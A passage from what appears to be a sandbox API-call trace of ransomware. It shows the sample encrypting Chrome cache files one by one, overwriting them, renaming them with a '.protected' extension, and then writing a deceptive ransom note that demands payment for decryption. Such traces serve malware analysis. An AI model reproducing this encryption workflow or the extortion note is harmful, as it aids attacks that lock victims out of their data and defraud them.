lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.284] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.284] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.284] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.284] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.284] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\.") returned 87 [0078.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.284] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.284] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.284] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.284] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.284] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.284] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.284] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\..") returned 88 [0078.284] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.284] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.284] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.284] lstrcmpiW (lpString1="data_0", lpString2="Windows") returned -1 [0078.284] lstrcmpiW (lpString1="data_0", lpString2="Program Files") returned -1 [0078.285] lstrcmpiW 
(lpString1="data_0", lpString2="Program Files (x86)") returned -1 [0078.285] lstrcmpiW (lpString1="data_0", lpString2="$Recycle.bin") returned 1 [0078.285] lstrcmpiW (lpString1="data_0", lpString2="System Volume Information") returned -1 [0078.285] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.285] StrStrIW (lpFirst="data_0", lpSrch=".protected") returned 0x0 [0078.285] lstrcmpW (lpString1="data_0", lpString2="RESTORE_FILES.txt") returned -1 [0078.285] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.285] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.286] StrStrW (lpFirst="data_0", lpSrch=".txt") returned 0x0 [0078.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.286] StrStrW (lpFirst="data_0", lpSrch=".rar") returned 0x0 [0078.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned 92 [0078.286] StrStrW (lpFirst="data_0", lpSrch=".zip") returned 0x0 
[0078.286] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.307] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.307] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.307] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.307] CloseHandle (hObject=0x158) returned 1 [0078.308] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.protected") returned 102 [0078.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0.protected")) returned 1 [0078.308] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="Windows") returned -1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="Program Files") returned -1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="Program Files (x86)") returned -1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="$Recycle.bin") returned 1 [0078.308] lstrcmpiW (lpString1="data_1", lpString2="System Volume Information") returned -1 [0078.308] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.308] StrStrIW (lpFirst="data_1", lpSrch=".protected") returned 0x0 [0078.308] lstrcmpW (lpString1="data_1", lpString2="RESTORE_FILES.txt") returned -1 [0078.308] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.308] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.309] StrStrW (lpFirst="data_1", lpSrch=".txt") returned 0x0 [0078.309] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.309] StrStrW (lpFirst="data_1", lpSrch=".rar") returned 0x0 [0078.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned 92 [0078.309] StrStrW (lpFirst="data_1", lpSrch=".zip") returned 0x0 [0078.309] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.322] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.322] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.322] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.322] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.332] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.332] CloseHandle (hObject=0x158) returned 1 [0078.332] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.protected") returned 102 [0078.332] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1.protected")) returned 1 [0078.344] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="Windows") returned -1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="Program Files") returned -1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="Program Files (x86)") returned -1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="$Recycle.bin") returned 1 [0078.344] lstrcmpiW (lpString1="data_2", lpString2="System Volume Information") returned -1 [0078.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.344] StrStrIW (lpFirst="data_2", lpSrch=".protected") returned 0x0 [0078.344] lstrcmpW (lpString1="data_2", lpString2="RESTORE_FILES.txt") returned -1 [0078.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.345] StrStrW (lpFirst="data_2", lpSrch=".txt") returned 0x0 [0078.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.345] StrStrW (lpFirst="data_2", lpSrch=".rar") returned 0x0 [0078.345] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned 92 [0078.345] StrStrW (lpFirst="data_2", lpSrch=".zip") returned 0x0 [0078.345] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2000, lpOverlapped=0x0) returned 1 [0078.354] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.355] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2000, lpOverlapped=0x0) returned 1 [0078.355] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.355] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.355] CloseHandle (hObject=0x158) returned 1 [0078.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.protected") returned 102 [0078.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2.protected")) returned 1 [0078.356] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="Windows") returned -1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="Program Files") returned -1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="Program Files (x86)") returned -1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="$Recycle.bin") returned 1 [0078.356] lstrcmpiW (lpString1="data_3", lpString2="System Volume Information") returned -1 [0078.356] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.356] StrStrIW (lpFirst="data_3", lpSrch=".protected") returned 0x0 [0078.356] lstrcmpW (lpString1="data_3", lpString2="RESTORE_FILES.txt") returned -1 [0078.356] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.356] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.357] StrStrW (lpFirst="data_3", lpSrch=".txt") returned 0x0 [0078.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.357] StrStrW (lpFirst="data_3", lpSrch=".rar") returned 0x0 [0078.357] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0078.357] StrStrW (lpFirst="data_3", lpSrch=".zip") returned 0x0 [0078.357] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.362] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.363] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.363] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.363] WriteFile (in: hFile=0x158, 
lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.392] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.392] CloseHandle (hObject=0x158) returned 1 [0078.392] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.protected") returned 102 [0078.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3.protected")) returned 1 [0078.393] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.393] lstrcmpiW (lpString1="index", lpString2="Windows") returned -1 [0078.393] lstrcmpiW (lpString1="index", lpString2="Program Files") returned -1 [0078.393] lstrcmpiW (lpString1="index", lpString2="Program Files (x86)") returned -1 [0078.393] lstrcmpiW (lpString1="index", lpString2="$Recycle.bin") returned 1 [0078.393] lstrcmpiW (lpString1="index", lpString2="System Volume Information") returned -1 [0078.393] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.393] StrStrIW 
(lpFirst="index", lpSrch=".protected") returned 0x0 [0078.393] lstrcmpW (lpString1="index", lpString2="RESTORE_FILES.txt") returned -1 [0078.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.394] StrStrW (lpFirst="index", lpSrch=".txt") returned 0x0 [0078.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.394] StrStrW (lpFirst="index", lpSrch=".rar") returned 0x0 [0078.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0078.394] StrStrW (lpFirst="index", lpSrch=".zip") returned 0x0 [0078.394] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.405] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.405] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.406] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.406] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.407] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.408] CloseHandle (hObject=0x158) returned 1 [0078.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.protected") returned 101 [0078.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index.protected")) returned 1 [0078.408] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.408] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.408] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\RESTORE_FILES.txt") returned 103 
[0078.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.409] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure 